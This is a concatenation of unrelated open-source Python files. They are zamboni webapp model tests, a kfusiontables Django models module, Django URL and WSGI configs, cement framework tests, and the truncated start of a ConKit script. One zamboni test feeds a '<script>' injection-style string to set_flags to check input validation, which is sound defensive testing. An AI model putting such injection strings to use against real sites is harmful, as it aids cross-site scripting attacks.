self.expected = [u'App Management API', u'Geolocation', u'Web Payment',
u'WebSMS']
self.af = AppFeatures.objects.get()
def _get_related_bool_obj(self):
return getattr(self.app.current_version, self.related_name)
def test_signature_parity(self):
# Test flags -> signature -> flags works as expected.
self._flag()
signature = self.app.current_version.features.to_signature()
eq_(signature.count('.'), 2, 'Unexpected signature format')
self.af.set_flags(signature)
self._check(self.af)
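# (assumed) to_signature() returns a dotted triple along the lines of
# '<hex feature bitfield>.<feature count>.<profile version>', which is why
# the test above expects exactly two '.' separators.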
def test_bad_data(self):
self.af.set_flags('foo')
self.af.set_flags('<script>')
def test_default_false(self):
obj = self.model(version=self.app.current_version)
eq_(getattr(obj, 'has_%s' % self.flags[0].lower()), False)
class TestWebappIndexer(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
def test_mapping_type_name(self):
eq_(WebappIndexer.get_mapping_type_name(), 'webapp')
def test_index(self):
with self.settings(ES_INDEXES={'webapp': 'apps'}):
eq_(WebappIndexer.get_index(), 'apps')
def test_model(self):
eq_(WebappIndexer.get_model(), Webapp)
def test_mapping(self):
mapping = WebappIndexer.get_mapping()
eq_(mapping.keys(), ['webapp'])
eq_(mapping['webapp']['_all'], {'enabled': False})
eq_(mapping['webapp']['_boost'], {'name': '_boost', 'null_value': 1.0})
def test_mapping_properties(self):
# Spot check a few of the key properties.
mapping = WebappIndexer.get_mapping()
keys = mapping['webapp']['properties'].keys()
for k in ('id', 'app_slug', 'category', 'default_locale',
'description', 'device', 'features', 'name', 'status'):
ok_(k in keys, 'Key %s not found in mapping properties' % k)
def _get_doc(self):
qs = Webapp.indexing_transformer(
Webapp.objects.no_cache().filter(id__in=[self.app.pk]))
obj = qs[0]
return obj, WebappIndexer.extract_document(obj.pk, obj)
def test_extract(self):
obj, doc = self._get_doc()
eq_(doc['id'], obj.id)
eq_(doc['app_slug'], obj.app_slug)
eq_(doc['category'], [])
eq_(doc['default_locale'], obj.default_locale)
eq_(doc['description'], list(
set(s for _, s in obj.translations[obj.description_id])))
eq_(doc['device'], [])
eq_(doc['name'], list(
set(s for _, s in obj.translations[obj.name_id])))
eq_(doc['status'], obj.status)
eq_(doc['is_escalated'], False)
eq_(doc['latest_version']['status'], amo.STATUS_PUBLIC)
eq_(doc['latest_version']['has_editor_comment'], False)
eq_(doc['latest_version']['has_info_request'], False)
def test_extract_category(self):
cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
AddonCategory.objects.create(addon=self.app, category=cat)
obj, doc = self._get_doc()
eq_(doc['category'], [cat.slug])
def test_extract_device(self):
device = DEVICE_TYPES.keys()[0]
AddonDeviceType.objects.create(addon=self.app, device_type=device)
obj, doc = self._get_doc()
eq_(doc['device'], [device])
def test_extract_features(self):
enabled = ('has_apps', 'has_sms', 'has_geolocation')
self.app.current_version.features.update(
**dict((k, True) for k in enabled))
obj, doc = self._get_doc()
for k, v in doc['features'].iteritems():
eq_(v, k in enabled)
def test_extract_regions(self):
self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
obj, doc = self._get_doc()
self.assertSetEqual(doc['region_exclusions'],
set([mkt.regions.BR.id, mkt.regions.UK.id]))
def test_extract_supported_locales(self):
locales = 'en-US,es,pt-BR'
self.app.current_version.update(supported_locales=locales)
obj, doc = self._get_doc()
self.assertSetEqual(doc['supported_locales'], set(locales.split(',')))
def test_extract_latest_version(self):
amo.tests.version_factory(addon=self.app, version='43.0',
has_editor_comment=True,
has_info_request=True,
file_kw=dict(status=amo.STATUS_REJECTED))
obj, doc = self._get_doc()
eq_(doc['latest_version']['status'], amo.STATUS_REJECTED)
eq_(doc['latest_version']['has_editor_comment'], True)
eq_(doc['latest_version']['has_info_request'], True)
def test_extract_is_escalated(self):
EscalationQueue.objects.create(addon=self.app)
obj, doc = self._get_doc()
eq_(doc['is_escalated'], True)
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.PEGI,))
@mock.patch.object(mkt.ratingsbodies.PEGI, 'name', 'peggyhill')
@mock.patch.object(mkt.ratingsbodies.PEGI_12, 'name', '12+')
@mock.patch.object(mkt.ratingsbodies.PEGI_12, 'description', 'be old')
def test_extract_content_ratings(self):
# These should not appear: their rating bodies fall outside the mocked region.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=0)
# This one should appear in `br` since we set Brazil to use PEGI.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.PEGI.id,
rating=mkt.ratingsbodies.PEGI_12.id)
obj, doc = self._get_doc()
eq_(doc['content_ratings']['br'][0], {
'body': 'peggyhill',
'body_slug': 'peggyhill',
'name': '12+',
'slug': '12',
'description': unicode('be old')})
@mock.patch.object(mkt.regions.VE, 'ratingsbodies', ())
@mock.patch.object(mkt.regions.RS, 'ratingsbodies', ())
@mock.patch.object(mkt.ratingsbodies.GENERIC, 'name', 'genny')
@mock.patch.object(mkt.ratingsbodies.GENERIC_12, 'name', 'genny-name')
@mock.patch.object(mkt.ratingsbodies.GENERIC_12, 'description', 'g-desc')
def test_extract_content_ratings_generic_fallback(self):
# These should not appear; they are associated with a specific region.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.PEGI.id,
rating=0)
# This one should appear in `generic`: Venezuela has no rating body
# specified, so it falls back to the manually attached catch-all
# generic region.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=mkt.ratingsbodies.GENERIC_12.id)
obj, doc = self._get_doc()
eq_(doc['content_ratings']['generic'][0], {
'body': 'genny',
'body_slug': 'genny',
'name': 'genny-name',
'slug': 'genny-name',
'description': unicode('g-desc')})
# Make sure the content rating is shoved in the generic region,
# not the actual regions (it'd be redundant).
assert 'rs' not in doc['content_ratings']
assert 've' not in doc['content_ratings']
class TestRatingDescriptors(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestRatingDescriptors, self).setUp()
self.model = RatingDescriptors
self.related_name = 'rating_descriptors'
self.BOOL_DICT = mkt.ratingdescriptors.RATING_DESCS
self.flags = ('USK_NO_DESCS', 'ESRB_VIOLENCE', 'PEGI_LANG',
'CLASSIND_DRUGS')
self.expected = [u'No Descriptors', u'Violence', u'Language', u'Drugs']
RatingDescriptors.objects.create(addon=self.app)
@mock.patch.dict('mkt.ratingdescriptors.RATING_DESCS',
USK_NO_DESCS={'name': _(u'H\xe9llo')})
def test_to_list_nonascii(self):
self.expected[0] = u'H\xe9llo'
self._flag()
to_list = self.app.rating_descriptors.to_list()
self.assertSetEqual(self.to_unicode(to_list), self.expected)
def test_desc_mapping(self):
descs = RatingDescriptors.objects.create(addon=app_factory())
for body, mapping in DESC_MAPPING.items():
for native, rating_desc_field in mapping.items():
assert hasattr(descs, rating_desc_field), rating_desc_field
def test_reverse_desc_mapping(self):
descs = RatingDescriptors.objects.create(addon=app_factory())
for desc in descs._fields():
eq_(type(REVERSE_DESC_MAPPING.get(desc)), unicode, desc)
def test_iarc_deserialize(self):
descs = RatingDescriptors.objects.create(
addon=app_factory(), has_esrb_blood=True, has_pegi_scary=True)
self.assertSetEqual(descs.iarc_deserialize().split(', '),
['Blood', 'Fear'])
eq_(descs.iarc_deserialize(body=mkt.ratingsbodies.ESRB), 'Blood')
class TestRatingInteractives(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestRatingInteractives, self).setUp()
self.model = RatingInteractives
self.related_name = 'rating_interactives'
self.BOOL_DICT = mkt.ratinginteractives.RATING_INTERACTIVES
self.flags = ('SHARES_INFO', 'DIGITAL_PURCHASES', 'SOCIAL_NETWORKING')
self.expected = [u'Shares Info', u'Digital Purchases',
u'Social Networking']
RatingInteractives.objects.create(addon=self.app)
def test_interactives_mapping(self):
interactives = RatingInteractives.objects.create(addon=app_factory())
for native, field in INTERACTIVES_MAPPING.items():
assert hasattr(interactives, field)
def test_reverse_interactives_mapping(self):
interactives = RatingInteractives.objects.create(addon=app_factory())
for interactive_field in interactives._fields():
assert REVERSE_INTERACTIVES_MAPPING.get(interactive_field)
def test_iarc_deserialize(self):
interactives = RatingInteractives.objects.create(
addon=app_factory(), has_users_interact=True, has_shares_info=True)
self.assertSetEqual(
interactives.iarc_deserialize().split(', '),
['Shares Info', 'Users Interact'])
class TestManifestUpload(BaseUploadTest, amo.tests.TestCase):
fixtures = fixture('webapp_337141')
@mock.patch('mkt.webapps.models.parse_addon')
def test_manifest_updated_developer_name(self, parse_addon):
parse_addon.return_value = {
'version': '4.0',
'developer_name': u'Méâ'
}
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'apps', 'devhub', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
app = Addon.objects.get(pk=337141)
app.manifest_updated('', upload)
version = app.current_version.reload()
eq_(version.version, '4.0')
eq_(version.developer_name, u'Méâ')
@mock.patch('mkt.webapps.models.parse_addon')
def test_manifest_updated_long_developer_name(self, parse_addon):
truncated_developer_name = u'é' * 255
long_developer_name = truncated_developer_name + u'ßßßß'
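# (assumed) Version.developer_name is capped at 255 characters, so the
# stored value should be the truncated 255-char prefix, not the full name.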
parse_addon.return_value = {
'version': '4.1',
'developer_name': long_developer_name,
}
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'apps', 'devhub', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
app = Addon.objects.get(pk=337141)
app.manifest_updated('', upload)
version = app.current_version.reload()
eq_(version.version, '4.1')
eq_(version.developer_name, truncated_developer_name)
class TestGeodata(amo.tests.WebappTestCase):
def setUp(self):
super(TestGeodata, self).setUp()
self.geo = self.app.geodata
def test_app_geodata(self):
assert isinstance(Webapp(id=337141).geodata, Geodata)
def test_unicode(self):
eq_(unicode(self.geo),
u'%s (unrestricted): <Webapp 337141>' % self.geo.id)
self.geo.update(restricted=True)
eq_(unicode(self.geo),
u'%s (restricted): <Webapp 337141>' % self.geo.id)
def test_get_status(self):
eq_(self.geo.get_status(mkt.regions.CN), amo.STATUS_NULL)
eq_(self.geo.region_cn_status, amo.STATUS_NULL)
def test_set_status(self):
status = amo.STATUS_PUBLIC
# Called with `save=False`.
self.geo.set_status(mkt.regions.CN, status)
eq_(self.geo.region_cn_status, status)
eq_(self.geo.reload().region_cn_status, amo.STATUS_NULL,
'`set_status(..., save=False)` should not save the value')
# Called with `save=True`.
self.geo.set_status(mkt.regions.CN, status, save=True)
eq_(self.geo.region_cn_status, status)
eq_(self.geo.reload().region_cn_status, status)
|
Joergen/zamboni
|
mkt/webapps/tests/test_models.py
|
Python
|
bsd-3-clause
| 66,033
|
from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import post_save
from django.utils.translation import ugettext_lazy as _
class TableMap(models.Model):
"""
Maps local tables to Google Fusion Tables via the fusiontable table id
and a local name built from the app_label and model name.
"""
table_name = models.CharField(
max_length=255,
default='',
verbose_name=_("Local table name (<app_label>;<model__name>)")
)
ft_id = models.CharField(
max_length=255,
default='',
verbose_name=_("Fusiontable table id")
)
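# Illustrative row (values hypothetical): table_name='shop;product' with
# ft_id='1AbCdE...' ties the local shop.Product model to its fusion table.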
class KFTQuerySet(models.query.QuerySet):
"""
KFT QuerySet. Contains an overridden update() method that sends the
post_save signal for each updated instance, passing the required data.
It also accepts a '__raw' flag which works like the 'raw' flag from the
base_save method.
"""
def update(self, **kwargs):
"""
Convert custom '__raw' flag to 'raw' flag from base_save.
Call post_save signal on update.
"""
# pop() (unlike get() + del) removes '__raw' even when it is passed
# explicitly as False, so the ORM never sees the unknown field.
raw = kwargs.pop('__raw', False)
super(KFTQuerySet, self).update(**kwargs)
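# Note: self._clone() re-evaluates the queryset *after* the update, so
# rows that no longer match the original filter will not receive the
# post_save signal.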
for instance in self._clone():
post_save.send(
sender=self.model,
instance=instance,
raw=raw
)
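# Usage sketch (illustrative; model name hypothetical). With this queryset,
# a bulk update fires post_save for each affected instance, so fusiontable
# sync hooks can react; '__raw=True' is forwarded as the signal's 'raw' flag:
#
#   SomeKFTModel.objects.filter(synced=False).update(name='x')
#   SomeKFTModel.objects.filter(synced=False).update(name='x', __raw=True)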
class KFTManager(models.Manager):
"""
KFT Manager. Required to expose the modified update() method from the
queryset. See the KFTQuerySet class.
"""
def get_queryset(self):
return KFTQuerySet(self.model, using=self._db)
class KFTModel(models.Model):
"""
Abstract base KFTModel. Adds the required bookkeeping fields. Models
whose tables should auto-synchronize must inherit from this abstract
class.
"""
class Meta:
abstract = True
objects = KFTManager()
_fusiontablesync = True
_ft_synced_at = models.DateTimeField(
blank=True,
null=True,
verbose_name=_("Date of the last synchronization")
)
_updated_at = models.DateTimeField(
blank=False,
null=False,
auto_now=True,
verbose_name=_("Date of the last update")
)
_ft_id = models.CharField(
max_length=255,
blank=True,
verbose_name=_("Google fusiontable row id")
)
# class TestModel1(KFTModel):
# test_field11 = models.CharField(max_length=255)
# test_field12 = models.CharField(max_length=255)
# class TestModel2(KFTModel):
# test_field21 = models.CharField(max_length=255)
# test_field22 = models.CharField(max_length=255)
|
kula1922/kfusiontables
|
kfusiontables/models.py
|
Python
|
bsd-3-clause
| 2,610
|
"""
WSGI config for DjangoChannel project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Config.settings")
application = get_wsgi_application()
|
ivermac/DjangoChannel
|
Config/wsgi.py
|
Python
|
bsd-3-clause
| 396
|
from django.conf.urls.defaults import *
from django.views.generic.simple import redirect_to
from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
#from registration.views import activate
from profiles.views import userprofile_show
from profiles.views import search_user, xhr_search_user
from profiles.views import ranking
from profiles.views import change_description
from profiles.views.votes import compare_votes_to_user
from profiles.views.votes import record_vote_on_user
from registration.views import register
from registration.views import activate
urlpatterns = patterns('',
#search
url(r'^search/$', search_user, name='search_user'),
url(r'^xhr_search/$', xhr_search_user, name='xhr_search_user'),
#ranking
url(r'^ranking/$', ranking, name='ranking'),
# views dealing with users.
url(r'^compare_votes_to_user/(?P<username>\w+)/$', compare_votes_to_user,
name='compare_votes_to_user',),
url(r'^vote/(?P<user_id>\d+)$', record_vote_on_user, name='vote_user'),
# profile and account management urls.
url(r'^userprofile/(?P<username>\w+)/$', userprofile_show,
name='userprofile',),
url(r'^changedescription/$', change_description,
name='change_description',),
# Registration views.
url(r'^activate/(?P<activation_key>\w+)/$',
activate,
{'backend': 'registration.backends.default.DefaultBackend', } ,
name='registration_activate',
),
url(r'^register/$',
register,
{'backend': 'registration.backends.default.DefaultBackend' } ,
name='registration_register'),
url(r'^register/complete/$',
direct_to_template,
{'template': 'registration/registration_complete.html'},
name='registration_complete'),
url(r'^activation/complete/$',
direct_to_template,
{'template': 'registration/activation_complete.html'},
name='registration_activation_complete'),
# basic login logout
url(r'^login/$', auth_views.login, {'template_name': 'profiles/login.html'},
name='auth_login'),
url(r'^logout/$', auth_views.logout, {'template_name': 'profiles/logout.html'},
name='logout'),
# password service.
url(r'^password/change/$', auth_views.password_change, name='auth_password_change'),
url(r'^password/change/done/$', auth_views.password_change_done,
name='auth_password_change_done'),
url(r'^password/reset/$', auth_views.password_reset,
name='auth_password_reset'),
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
auth_views.password_reset_confirm,
name='auth_password_reset_confirm'),
url(r'^password/reset/complete/$', auth_views.password_reset_complete,
name='auth_password_reset_complete'),
url(r'^password/reset/done/$', auth_views.password_reset_done,
name='auth_password_reset_done'),
)
|
spreeker/democracygame
|
democracy/profiles/urls.py
|
Python
|
bsd-3-clause
| 2,960
|
"""Tests for cement.core.setup."""
import os
import sys
import json
import signal
from time import sleep
from cement.core import foundation, exc, backend, config, extension, plugin
from cement.core.handler import CementBaseHandler
from cement.core.controller import CementBaseController, expose
from cement.core import log, output, hook, arg, controller
from cement.core.interface import Interface
from cement.utils import test
from cement.core.exc import CaughtSignal
from cement.utils.misc import init_defaults, rando, minimal_logger
from nose.plugins.attrib import attr
APP = rando()[:12]
def my_extended_func():
return 'KAPLA'
class DeprecatedApp(foundation.CementApp):
class Meta:
label = 'deprecated'
defaults = None
class HookTestException(Exception):
pass
class MyTestInterface(Interface):
class IMeta:
label = 'my_test_interface'
class MyTestHandler(CementBaseHandler):
class Meta:
label = 'my_test_handler'
interface = MyTestInterface
class TestOutputHandler(output.CementOutputHandler):
file_suffix = None
class Meta:
interface = output.IOutput
label = 'test_output_handler'
def _setup(self, config_obj):
self.config = config_obj
def render(self, data_dict, template=None):
return None
class BogusBaseController(controller.CementBaseController):
class Meta:
label = 'bad_base_controller_label'
def my_hook_one(app):
return 1
def my_hook_two(app):
return 2
def my_hook_three(app):
return 3
class FoundationTestCase(test.CementCoreTestCase):
def setUp(self):
super(FoundationTestCase, self).setUp()
self.app = self.make_app('my_app')
def test_argv_is_none(self):
app = self.make_app(APP, argv=None)
app.setup()
self.eq(app.argv, list(sys.argv[1:]))
def test_framework_logging_is_true(self):
del os.environ['CEMENT_FRAMEWORK_LOGGING']
app = self.make_app(APP, argv=None, framework_logging=True)
app.setup()
self.eq(os.environ['CEMENT_FRAMEWORK_LOGGING'], '1')
ml = minimal_logger(__name__)
self.eq(ml.logging_is_enabled, True)
def test_framework_logging_is_false(self):
del os.environ['CEMENT_FRAMEWORK_LOGGING']
app = self.make_app(APP, argv=None, framework_logging=False)
app.setup()
self.eq(os.environ['CEMENT_FRAMEWORK_LOGGING'], '0')
ml = minimal_logger(__name__)
self.eq(ml.logging_is_enabled, False)
# coverage... should default to True if no key in os.environ
del os.environ['CEMENT_FRAMEWORK_LOGGING']
self.eq(ml.logging_is_enabled, True)
def test_bootstrap(self):
app = self.make_app('my_app', bootstrap='tests.bootstrap')
app.setup()
self.eq(app._loaded_bootstrap.__name__, 'tests.bootstrap')
def test_reload_bootstrap(self):
app = self.make_app('my_app', bootstrap='cement.utils.test')
app._loaded_bootstrap = test
app.setup()
self.eq(app._loaded_bootstrap.__name__, 'cement.utils.test')
def test_argv(self):
app = self.make_app('my_app', argv=['bogus', 'args'])
self.eq(app.argv, ['bogus', 'args'])
@test.raises(exc.FrameworkError)
def test_resolve_handler_bad_handler(self):
class Bogus(object):
pass
try:
self.app._resolve_handler('output', Bogus)
except exc.FrameworkError as e:
self.ok(e.msg.find('resolve'))
raise
def test_default(self):
self.app.setup()
self.app.run()
def test_passed_handlers(self):
from cement.ext import ext_configparser
from cement.ext import ext_logging
from cement.ext import ext_argparse
from cement.ext import ext_plugin
from cement.ext import ext_dummy
# forces CementApp._resolve_handler to register the handler
from cement.ext import ext_json
app = self.make_app('my-app-test',
config_handler=ext_configparser.ConfigParserConfigHandler,
log_handler=ext_logging.LoggingLogHandler(),
arg_handler=ext_argparse.ArgParseArgumentHandler(),
extension_handler=extension.CementExtensionHandler(),
plugin_handler=ext_plugin.CementPluginHandler(),
output_handler=ext_json.JsonOutputHandler(),
mail_handler=ext_dummy.DummyMailHandler(),
argv=[__file__, '--debug']
)
app.setup()
def test_debug(self):
app = self.make_app('my-app-test', argv=[__file__])
app.setup()
self.eq(app.debug, False)
self.reset_backend()
app = self.make_app('my-app-test', argv=[__file__, '--debug'])
app.setup()
self.eq(app.debug, True)
self.reset_backend()
defaults = init_defaults('my-app-test')
defaults['my-app-test']['debug'] = True
app = self.make_app('my-app-test', argv=[__file__],
config_defaults=defaults)
app.setup()
self.eq(app.debug, True)
def test_render(self):
# Render with default
self.app.setup()
self.app.render(dict(foo='bar'))
# Render with no output_handler... this is hackish, but there are
# circumstances where app.output would be None.
app = self.make_app('test', output_handler=None)
app.setup()
app.output = None
app.render(dict(foo='bar'))
def test_render_out_to_file(self):
self.app = self.make_app(APP, extensions=['json'],
output_handler='json')
self.app.setup()
self.app.run()
f = open(self.tmp_file, 'w')
self.app.render(dict(foo='bar'), out=f)
f.close()
f = open(self.tmp_file, 'r')
data = json.load(f)
f.close()
self.eq(data, dict(foo='bar'))
@test.raises(TypeError)
def test_render_bad_out(self):
self.app.setup()
self.app.run()
try:
self.app.render(dict(foo='bar'), out='bogus type')
except TypeError as e:
self.eq(e.args[0], "Argument 'out' must be a 'file' like object")
raise
@test.raises(exc.FrameworkError)
def test_bad_label(self):
try:
app = foundation.CementApp(None)
except exc.FrameworkError as e:
# FIX ME: verify error msg
raise
@test.raises(exc.FrameworkError)
def test_bad_label_chars(self):
try:
app = foundation.CementApp('some!bogus()label')
except exc.FrameworkError as e:
self.ok(e.msg.find('alpha-numeric'))
raise
def test_add_arg_shortcut(self):
self.app.setup()
self.app.add_arg('--foo', action='store')
def test_reset_output_handler(self):
app = self.make_app('test', argv=[], output_handler=TestOutputHandler)
app.setup()
app.run()
app.output = None
app._meta.output_handler = None
app._setup_output_handler()
def test_lay_cement(self):
app = self.make_app('test', argv=['--quiet'])
def test_none_member(self):
class Test(object):
var = None
self.app.setup()
self.app.args.parsed_args = Test()
try:
self.app._parse_args()
except SystemExit:
pass
@test.raises(exc.CaughtSignal)
def test_cement_signal_handler(self):
import signal
import types
global app
app = self.make_app('test')
frame = sys._getframe(0)
try:
foundation.cement_signal_handler(signal.SIGTERM, frame)
except exc.CaughtSignal as e:
self.eq(e.signum, signal.SIGTERM)
self.ok(isinstance(e.frame, types.FrameType))
raise
def test_cement_without_signals(self):
app = self.make_app('test', catch_signals=None)
app.setup()
def test_extend(self):
self.app.extend('kapla', my_extended_func)
self.eq(self.app.kapla(), 'KAPLA')
@test.raises(exc.FrameworkError)
def test_extended_duplicate(self):
self.app.extend('config', my_extended_func)
def test_no_handler(self):
app = self.make_app(APP)
app._resolve_handler('cache', None, raise_error=False)
def test_config_files_is_none(self):
app = self.make_app(APP, config_files=None)
app.setup()
label = APP
user_home = os.path.abspath(os.path.expanduser(os.environ['HOME']))
files = [
os.path.join('/', 'etc', label, '%s.conf' % label),
os.path.join(user_home, '.%s.conf' % label),
os.path.join(user_home, '.%s' % label, 'config'),
]
for f in files:
res = f in app._meta.config_files
self.ok(res)
@test.raises(exc.FrameworkError)
def test_base_controller_label(self):
app = self.make_app(APP, base_controller=BogusBaseController)
app.setup()
def test_pargs(self):
app = self.make_app(argv=['--debug'])
app.setup()
app.run()
self.eq(app.pargs.debug, True)
def test_last_rendered(self):
self.app.setup()
output_text = self.app.render({'foo': 'bar'})
last_data, last_output = self.app.last_rendered
self.eq({'foo': 'bar'}, last_data)
self.eq(output_text, last_output)
def test_get_last_rendered(self):
# DEPRECATED - REMOVE AFTER THE FUNCTION IS REMOVED
self.app.setup()
output_text = self.app.render({'foo': 'bar'})
last_data, last_output = self.app.get_last_rendered()
self.eq({'foo': 'bar'}, last_data)
self.eq(output_text, last_output)
def test_with_operator(self):
with self.app_class() as app:
app.run()
@test.raises(SystemExit)
def test_close_with_code(self):
app = self.make_app(APP, exit_on_close=True)
app.setup()
app.run()
try:
app.close(114)
except SystemExit as e:
self.eq(e.code, 114)
raise
@test.raises(AssertionError)
def test_close_with_bad_code(self):
self.app.setup()
self.app.run()
try:
self.app.close('Not An Int')
except AssertionError as e:
self.eq(e.args[0], "Invalid exit status code (must be integer)")
raise
def test_handler_override_options(self):
app = self.make_app(APP,
argv=['-o', 'json'],
extensions=['yaml', 'json'],
)
app.setup()
app.run()
self.eq(app._meta.output_handler, 'json')
def test_handler_override_options_is_none(self):
app = self.make_app(APP,
core_handler_override_options=None,
handler_override_options=None
)
app.setup()
app.run()
def test_handler_override_invalid_interface(self):
app = self.make_app(APP,
handler_override_options=dict(
bogus_interface=(['-f'], ['--foo'], {}),
)
)
app.setup()
app.run()
def test_handler_override_options_not_passed(self):
app = self.make_app(APP,
extensions=['yaml', 'json'],
)
app.setup()
app.run()
def test_suppress_output_while_debug(self):
app = self.make_app(APP, debug=True)
app.setup()
app._suppress_output()
def test_core_meta_override(self):
defaults = init_defaults(APP)
defaults[APP]['mail_handler'] = 'dummy'
app = self.make_app(APP, debug=True, config_defaults=defaults)
app.setup()
app.run()
def test_define_hooks_meta(self):
app = self.make_app(APP, define_hooks=['my_custom_hook'])
app.setup()
self.ok(hook.defined('my_custom_hook'))
@test.raises(HookTestException)
def test_register_hooks_meta(self):
def my_custom_hook_func():
raise HookTestException('OK')
app = self.make_app(APP,
define_hooks=['my_custom_hook'],
hooks=[('my_custom_hook', my_custom_hook_func)])
app.setup()
for res in hook.run('my_custom_hook'):
pass
def test_register_hooks_meta_retry(self):
# Hooks registered this way for non-framework hooks need to be retried,
# so make sure the hook is actually being registered.
def my_custom_hook_func():
raise HookTestException('OK')
app = self.make_app(APP,
extensions=['watchdog'],
hooks=[
('watchdog_pre_start', my_custom_hook_func)
]
)
app.setup()
self.eq(len(app.hook.__hooks__['watchdog_pre_start']), 1)
def test_define_handlers_meta(self):
app = self.make_app(APP, define_handlers=[MyTestInterface])
app.setup()
self.ok(app.handler.defined('my_test_interface'))
def test_register_handlers_meta(self):
app = self.make_app(APP,
define_handlers=[MyTestInterface],
handlers=[MyTestHandler],
)
app.setup()
self.ok(app.handler.registered('my_test_interface',
'my_test_handler'))
def test_disable_backend_globals(self):
app = self.make_app(APP,
use_backend_globals=False,
define_handlers=[MyTestInterface],
handlers=[MyTestHandler],
define_hooks=['my_hook'],
)
app.setup()
self.ok(app.handler.registered('my_test_interface',
'my_test_handler'))
self.ok(app.hook.defined('my_hook'))
def test_reload(self):
with self.app as app:
app.hook.define('bogus_hook1')
app.handler.define(MyTestInterface)
app.extend('some_extra_member', dict())
app.run()
self.ok(app.hook.defined('bogus_hook1'))
self.ok(app.handler.defined('my_test_interface'))
app.reload()
self.eq(app.hook.defined('bogus_hook1'), False)
self.eq(app.handler.defined('my_test_interface'), False)
app.run()
@test.raises(AssertionError)
def test_run_forever(self):
class Controller(CementBaseController):
class Meta:
label = 'base'
@expose()
def runit(self):
raise Exception("Fake some error")
app = self.make_app(base_controller=Controller, argv=['runit'])
def handler(signum, frame):
raise AssertionError('It ran forever!')
# set the signal handler and a 5-second alarm
signal.signal(signal.SIGALRM, handler)
signal.alarm(5)
try:
# this will run indefinitely
with app as app:
app.run_forever()
except AssertionError as e:
self.eq(e.args[0], 'It ran forever!')
raise
finally:
signal.alarm(0)
def test_add_template_directory(self):
self.app.setup()
self.app.add_template_dir(self.tmp_dir)
res = self.tmp_dir in self.app._meta.template_dirs
self.ok(res)
def test_remove_template_directory(self):
self.app.setup()
self.app.add_template_dir(self.tmp_dir)
res = self.tmp_dir in self.app._meta.template_dirs
self.ok(res)
self.app.remove_template_dir(self.tmp_dir)
res = self.tmp_dir not in self.app._meta.template_dirs
self.ok(res)
def test_alternative_module_mapping(self):
# just to have something for coverage
app = self.make_app(alternative_module_mapping=dict(time='time'))
app.setup()
app.__import__('time')
app.__import__('sleep', from_module='time')
def test_meta_defaults(self):
DEBUG_FORMAT = "TEST DEBUG FORMAT - %s" % self.rando
META = {}
META['log.logging'] = {}
META['log.logging']['debug_format'] = DEBUG_FORMAT
app = self.make_app(meta_defaults=META)
app.setup()
self.eq(app.log._meta.debug_format, DEBUG_FORMAT)
|
akhilman/cement
|
tests/core/foundation_tests.py
|
Python
|
bsd-3-clause
| 16,592
|
#!/usr/bin/env python
#
# BSD 3-Clause License
#
# Copyright (c) 2016-21, University of Liverpool
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This script calculates the precision score for a contact prediction
when compared against contacts extracted from a protein structure.
"""
__author__ = "Felix Simkovic"
__date__ = "21 Nov 2016"
__version__ = "0.13.1"
import argparse
import conkit.command_line
import conkit.io
logger = None
def main():
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"-c",
dest="pdbchain",
default=None,
help="PDB chain to use [default: first in file]. "
